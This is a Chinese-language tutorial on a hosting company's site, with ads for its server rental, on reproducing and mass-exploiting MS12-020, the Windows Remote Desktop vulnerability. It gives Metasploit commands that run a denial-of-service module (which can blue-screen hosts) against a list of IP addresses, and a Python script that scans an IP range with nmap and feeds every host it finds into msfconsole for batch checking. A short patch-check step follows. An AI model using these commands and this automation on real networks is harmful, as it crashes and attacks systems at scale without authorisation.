成都网站建设设计

将想法与焦点和您一起共享

MS12-020漏洞复现及自动化批量利用-创新互联

漏洞描述

Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)

影响目标

Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2

msfpayload利用

msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost 
run

此pyload仅支持单目标。

成都服务器托管,创新互联提供包括服务器租用、成都服务器托管、带宽租用、云主机、机柜租用、主机租用托管、CDN网站加速、域名与空间等业务的一体化完整服务。电话咨询:13518219792

通过msfconsole快速启动

msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"

通过bash脚本批量生成检测脚本(nmap-port2ip.py)

#encoding:utf-8
import xml.sax
import sys
import os

class MovieHandler( xml.sax.ContentHandler ):
   def __init__(self, filterport=None):
      self.CurrentData = ""
      self.port=filterport
      self.data = ""
      self.datas=[]

   # 元素开始事件处理
   def startElement(self, tag, attributes):
      self.CurrentData = tag
      if tag == "address":
         self.data=attributes["addr"]

   # 元素结束事件处理
   def endElement(self, tag):
      if self.CurrentData == "address":
         self.datas.append(self.data)
         self.data=""
      self.CurrentData = ""
class Gather(object):
    def __init__(self, filterport=None):
        # 创建一个 XMLReader
        self.parser = xml.sax.make_parser()
        # turn off namepsaces
        self.parser.setFeature(xml.sax.handler.feature_namespaces, 0)

        # 重写 ContextHandler
        self.Handler = MovieHandler(filterport)
        self.parser.setContentHandler( self.Handler )
    def run(self, port):
        self.Handler.datas=[]
        self.parser.parse(port+".xml")
        print(self.Handler.datas)
    def get_ans(self):
        return self.Handler.datas

if __name__ == "__main__":
    if len(sys.argv) !=3:
        os.exit()
    os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml")
    g = Gather()
    g.run(sys.argv[2])
    # create cmd
    cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;'

    ips = g.get_ans()
    if len(ips)>0:
        for ip in g.get_ans():
            cmd += "set rhosts "+ip+";run;"
        cmd += 'exit;"'
        os.system("msfconsole -x " + cmd)
# 使用方法
python nmap-port2ip.py  
# 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。
# ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致
# port仅支持单端口

漏洞补丁检测

systeminfo | find /i "KB2621440"
如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。

Windows Server 2003补丁

参考文章

  1. 微软MS12-020

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


文章标题:MS12-020漏洞复现及自动化批量利用-创新互联
本文地址:http://chengdu.cdxwcx.cn/article/gidhp.html